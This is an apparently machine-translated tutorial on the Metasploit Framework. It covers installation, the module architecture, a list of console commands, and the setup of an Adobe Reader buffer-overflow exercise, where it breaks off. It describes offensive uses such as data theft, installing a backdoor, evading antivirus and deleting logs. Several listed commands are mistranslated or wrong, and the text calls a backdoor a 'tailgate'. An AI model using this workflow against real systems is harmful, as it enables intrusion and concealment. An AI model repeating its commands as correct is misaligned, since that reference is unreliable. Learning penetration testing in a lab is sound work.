Metasploit Framework is fully available on the Windows platform. To install it, simply download the latest version from the following link: metasploit.com, then run the executable,
Then click the traditional "next" until the "Finish" button appears.
When finished, you can access the standard msfconsole interface, from the start menu.
To update on Windows, just launch the Metasploit console and click File menu -> New tab -> Development - Update Metasploit.
What can we do with Metasploit
The Framework allows you to do many things like:
- Scan and collect all information on one machine
- Identification and exploitation of vulnerabilities
- Privilege escalation and data theft
- Installation of a tailgate
- Escape from antivirus
- Delete logs and tracks
The Framework is structured as follows:
At first sight of the image, we see that the architecture is modular and that it works under several interfaces (Graphics, WEB, CLI and Console).
In the rest of the article we will use the console interface, it is the most suitable interface for the full use of MSF (metasploit Framework).
The main advantage of the Framework: it is this modularity that makes it possible to combine any exploit with any payload. It makes things easier for attackers, exploit developers, and payload developers.
These are ruby scripts that allow us to exploit vulnerability on a remote machine. We can say that the exploit gives us the possibility to connect to a vulnerable machine.
This is the code that is executed after entering the target machine; it allows us to control the victim machine. Like for example: opening a port on the machine connected to a shell or even opening a VNC session.
These are modules that are used for various tasks like port scanning, sniffing, service scanning.
Once the exploit and payload are executed on a vulnerable machine, it can do whatever it wants to the system, such as download the target's data, install malware, take a screenshot, etc.
How to use Metasploit?
We now move on to the most interesting part, which is the use of Metasploit.
Here are the basic steps to operate a system with Metasploit:
- Collect information about the target, such as the operating system version and installed network services. This information can be retrieved using footprint and port scanning tools such as Nmap, Maltego, and Nessus;
- Choose and configure an exploit;
- Check if the targeted target system is sensitive to the chosen exploit;
- Choose and configure a payload;
- Run the exploit.
For now, we'll start with some basic commands.
- How to see all available exploits in Metasploit: Show exploits
- To search for an exploit: Search for exploit_name
- To select an exploit: Use exploit_name
- Have information about an exploit: Information exploit_name
- See the options of an exploit: Show options
- Show all available payloads in Metasploit: Show Payload
- Choose the payload to use: set PAYLOAD payload_name
- See Payload Options for a setting: Show Options
- Where to Get Help: Calls for Help
- If you want to know the version of Metasploit: version
- If we want to list all exploits, modules, playloads: search
- To exit Metasploit: quit
- Metasploit Usage Example
Now we are going to practice and exploit a flaw in one of the Adobe company software.
This is a vulnerability of concern in Adobe Reader v9.0.0 (Windows XP SP3) and Adobe Reader v8.1.2 (Windows XP SP2). Opening a pdf file with these versions causes a "Buffer Overflow" and thus allows a malicious person to remotely take control of a machine.
To perform this test, first download version 9.0.0 of Adobe Reader. The exploit module that reproduces this defect is known by the name "adobe_jbig2decode".